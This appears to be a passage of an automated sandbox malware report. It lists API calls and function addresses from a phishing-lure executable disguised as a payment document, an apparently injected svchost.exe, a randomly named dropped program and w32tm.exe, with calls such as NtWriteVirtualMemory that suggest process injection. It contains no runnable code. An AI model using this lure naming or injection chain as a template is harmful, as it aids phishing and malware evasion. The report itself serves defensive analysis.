Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03952C70 NtFreeVirtualMemory,LdrInitializeThunk,	3_2_03952C70
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03952C60 NtCreateKey,LdrInitializeThunk,	3_2_03952C60
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039535C0 NtCreateMutant,LdrInitializeThunk,	3_2_039535C0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039539B0 NtGetContextThread,LdrInitializeThunk,	3_2_039539B0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03952B80 NtQueryInformationFile,	3_2_03952B80
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03952AB0 NtWaitForSingleObject,	3_2_03952AB0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03952F90 NtProtectVirtualMemory,	3_2_03952F90
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03952FA0 NtQuerySection,	3_2_03952FA0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03952F60 NtCreateProcessEx,	3_2_03952F60
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03952EA0 NtAdjustPrivilegesToken,	3_2_03952EA0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03952E30 NtWriteVirtualMemory,	3_2_03952E30
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03952DB0 NtEnumerateKey,	3_2_03952DB0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03952D00 NtSetInformationFile,	3_2_03952D00
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03952CC0 NtQueryVirtualMemory,	3_2_03952CC0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03952CF0 NtOpenProcess,	3_2_03952CF0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03952C00 NtQueryInformationProcess,	3_2_03952C00
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03953090 NtSetValueKey,	3_2_03953090
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03953010 NtOpenDirectoryObject,	3_2_03953010
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03953D10 NtOpenProcessToken,	3_2_03953D10
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03953D70 NtOpenThread,	3_2_03953D70
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_00DF96A0 NtCreateFile,	3_2_00DF96A0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_00DF9810 NtReadFile,	3_2_00DF9810
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_00DF99C0 NtClose,	3_2_00DF99C0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_00DF9910 NtDeleteFile,	3_2_00DF9910
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_00DF9B20 NtAllocateVirtualMemory,	3_2_00DF9B20

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe

Code function: 0_2_0094D5EB: CreateFileW,DeviceIoControl,CloseHandle,

0_2_0094D5EB

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe

Code function: 0_2_00941201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00941201

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe

Code function: 0_2_0094E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_0094E8F6

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_00952046	0_2_00952046
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_008E8060	0_2_008E8060
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_00948298	0_2_00948298
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_0091E4FF	0_2_0091E4FF
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_0091676B	0_2_0091676B
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_00974873	0_2_00974873
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_0090CAA0	0_2_0090CAA0
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_008ECAF0	0_2_008ECAF0
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_008FCC39	0_2_008FCC39
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_00916DD9	0_2_00916DD9
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_008E91C0	0_2_008E91C0
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_008FB119	0_2_008FB119
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_00901394	0_2_00901394
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_00901706	0_2_00901706
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_0090781B	0_2_0090781B
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_009019B0	0_2_009019B0
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_008E7920	0_2_008E7920
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_008F997D	0_2_008F997D
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_00907A4A	0_2_00907A4A
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_00907CA7	0_2_00907CA7
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_00901C77	0_2_00901C77
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_00919EEE	0_2_00919EEE
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_0096BE44	0_2_0096BE44
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_00901F32	0_2_00901F32
Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Code function: 0_2_041C0880	0_2_041C0880
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00418B73	1_2_00418B73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00403090	1_2_00403090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00410313	1_2_00410313
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0042F333	1_2_0042F333
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402BC0	1_2_00402BC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00401420	1_2_00401420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00416D6E	1_2_00416D6E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00416D73	1_2_00416D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040E513	1_2_0040E513
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00410533	1_2_00410533
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040E657	1_2_0040E657
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040E663	1_2_0040E663
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040E6AC	1_2_0040E6AC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402750	1_2_00402750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362D34C	1_2_0362D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036FA352	1_2_036FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F132D	1_2_036F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364E3F0	1_2_0364E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037003E6	1_2_037003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0368739A	1_2_0368739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E0274	1_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E12ED	1_2_036E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365D2F0	1_2_0365D2F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365B2C0	1_2_0365B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C02C0	1_2_036C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036452A0	1_2_036452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0367516C	1_2_0367516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F172	1_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0370B16B	1_2_0370B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C8158	1_2_036C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03630100	1_2_03630100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036DA118	1_2_036DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F81CC	1_2_036F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364B1B0	1_2_0364B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037001AA	1_2_037001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F70E9	1_2_036F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036FF0E0	1_2_036FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036EF0CC	1_2_036EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036470C0	1_2_036470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640770	1_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03664750	1_2_03664750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363C7C0	1_2_0363C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036FF7B0	1_2_036FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365C6E0	1_2_0365C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F16CC	1_2_036F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F7571	1_2_036F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640535	1_2_03640535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036DD5B0	1_2_036DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03700591	1_2_03700591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03631460	1_2_03631460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F2446	1_2_036F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036FF43F	1_2_036FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036EE4F6	1_2_036EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036FFB76	1_2_036FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036FAB40	1_2_036FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B5BF0	1_2_036B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0367DBF9	1_2_0367DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F6BD7	1_2_036F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365FB80	1_2_0365FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B3A6C	1_2_036B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036FFA49	1_2_036FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F7A46	1_2_036F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036EDAC6	1_2_036EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036DDAAC	1_2_036DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03685AA0	1_2_03685AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363EA80	1_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03656962	1_2_03656962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03649950	1_2_03649950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365B950	1_2_0365B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036429A0	1_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0370A9A6	1_2_0370A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03642840	1_2_03642840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364A840	1_2_0364A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AD800	1_2_036AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036438E0	1_2_036438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366E8F0	1_2_0366E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036268B8	1_2_036268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B4F40	1_2_036B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03682F28	1_2_03682F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03660F30	1_2_03660F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036FFF09	1_2_036FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03632FC8	1_2_03632FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036BEFA0	1_2_036BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036FFFB1	1_2_036FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03641F92	1_2_03641F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640E59	1_2_03640E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036FEE26	1_2_036FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036FEEDB	1_2_036FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03649EB0	1_2_03649EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03652E90	1_2_03652E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036FCE93	1_2_036FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F7D73	1_2_036F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03643D40	1_2_03643D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F1D5A	1_2_036F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364AD00	1_2_0364AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363ADE0	1_2_0363ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365FDC0	1_2_0365FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03658DBF	1_2_03658DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B9C32	1_2_036B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640C00	1_2_03640C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03630CF2	1_2_03630CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036FFCF2	1_2_036FFCF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E0CB5	1_2_036E0CB5
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	Code function: 2_2_03E80AF6	2_2_03E80AF6
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	Code function: 2_2_03E80AAD	2_2_03E80AAD
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	Code function: 2_2_03E80AA1	2_2_03E80AA1
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	Code function: 2_2_03E891B8	2_2_03E891B8
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	Code function: 2_2_03E891BD	2_2_03E891BD
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	Code function: 2_2_03E8297D	2_2_03E8297D
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	Code function: 2_2_03E8095D	2_2_03E8095D
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	Code function: 2_2_03EA177D	2_2_03EA177D
Source: C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe	Code function: 2_2_03E8275D	2_2_03E8275D
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_0392E3F0	3_2_0392E3F0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039E03E6	3_2_039E03E6
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039DA352	3_2_039DA352
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039A02C0	3_2_039A02C0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039C0274	3_2_039C0274
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039E01AA	3_2_039E01AA
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039D81CC	3_2_039D81CC
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039BA118	3_2_039BA118
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03910100	3_2_03910100
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039A8158	3_2_039A8158
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039B2000	3_2_039B2000
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_0391C7C0	3_2_0391C7C0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03944750	3_2_03944750
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03920770	3_2_03920770
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_0393C6E0	3_2_0393C6E0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039E0591	3_2_039E0591
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03920535	3_2_03920535
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039CE4F6	3_2_039CE4F6
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039C4420	3_2_039C4420
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039D2446	3_2_039D2446
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039D6BD7	3_2_039D6BD7
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039DAB40	3_2_039DAB40
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_0391EA80	3_2_0391EA80
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039229A0	3_2_039229A0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039EA9A6	3_2_039EA9A6
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03936962	3_2_03936962
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039068B8	3_2_039068B8
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_0394E8F0	3_2_0394E8F0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03922840	3_2_03922840
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_0392A840	3_2_0392A840
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_0399EFA0	3_2_0399EFA0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03912FC8	3_2_03912FC8
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03940F30	3_2_03940F30
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039C2F30	3_2_039C2F30
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03962F28	3_2_03962F28
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03994F40	3_2_03994F40
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03932E90	3_2_03932E90
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039DCE93	3_2_039DCE93
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039DEEDB	3_2_039DEEDB
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039DEE26	3_2_039DEE26
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03920E59	3_2_03920E59
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03938DBF	3_2_03938DBF
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_0391ADE0	3_2_0391ADE0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039BCD1F	3_2_039BCD1F
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_0392AD00	3_2_0392AD00
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039C0CB5	3_2_039C0CB5
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03910CF2	3_2_03910CF2
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03920C00	3_2_03920C00
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_0396739A	3_2_0396739A
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039D132D	3_2_039D132D
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_0390D34C	3_2_0390D34C
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039252A0	3_2_039252A0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_0393B2C0	3_2_0393B2C0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_0393D2F0	3_2_0393D2F0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039C12ED	3_2_039C12ED
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_0392B1B0	3_2_0392B1B0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_0390F172	3_2_0390F172
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039EB16B	3_2_039EB16B
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_0395516C	3_2_0395516C
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039CF0CC	3_2_039CF0CC
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039270C0	3_2_039270C0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039D70E9	3_2_039D70E9
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039DF0E0	3_2_039DF0E0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039DF7B0	3_2_039DF7B0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039D16CC	3_2_039D16CC
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039BD5B0	3_2_039BD5B0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039D7571	3_2_039D7571
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039DF43F	3_2_039DF43F
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03911460	3_2_03911460
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_0393FB80	3_2_0393FB80
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03995BF0	3_2_03995BF0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_0395DBF9	3_2_0395DBF9
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039DFB76	3_2_039DFB76
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03965AA0	3_2_03965AA0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039BDAAC	3_2_039BDAAC
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039C1AA3	3_2_039C1AA3
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039CDAC6	3_2_039CDAC6
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039DFA49	3_2_039DFA49
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039D7A46	3_2_039D7A46
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03993A6C	3_2_03993A6C
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039B5910	3_2_039B5910
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03929950	3_2_03929950
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_0393B950	3_2_0393B950
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039238E0	3_2_039238E0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_0398D800	3_2_0398D800
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03921F92	3_2_03921F92
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039DFFB1	3_2_039DFFB1
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039DFF09	3_2_039DFF09
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03929EB0	3_2_03929EB0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_0393FDC0	3_2_0393FDC0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039D1D5A	3_2_039D1D5A
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03923D40	3_2_03923D40
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039D7D73	3_2_039D7D73
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_039DFCF2	3_2_039DFCF2
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03999C32	3_2_03999C32
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_00DE2180	3_2_00DE2180
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_00DFC010	3_2_00DFC010
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_00DDCFF0	3_2_00DDCFF0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_00DDB1F0	3_2_00DDB1F0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_00DDD210	3_2_00DDD210
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_00DDB389	3_2_00DDB389
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_00DDB340	3_2_00DDB340
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_00DDB334	3_2_00DDB334
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_00DE5850	3_2_00DE5850
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_00DE3A50	3_2_00DE3A50
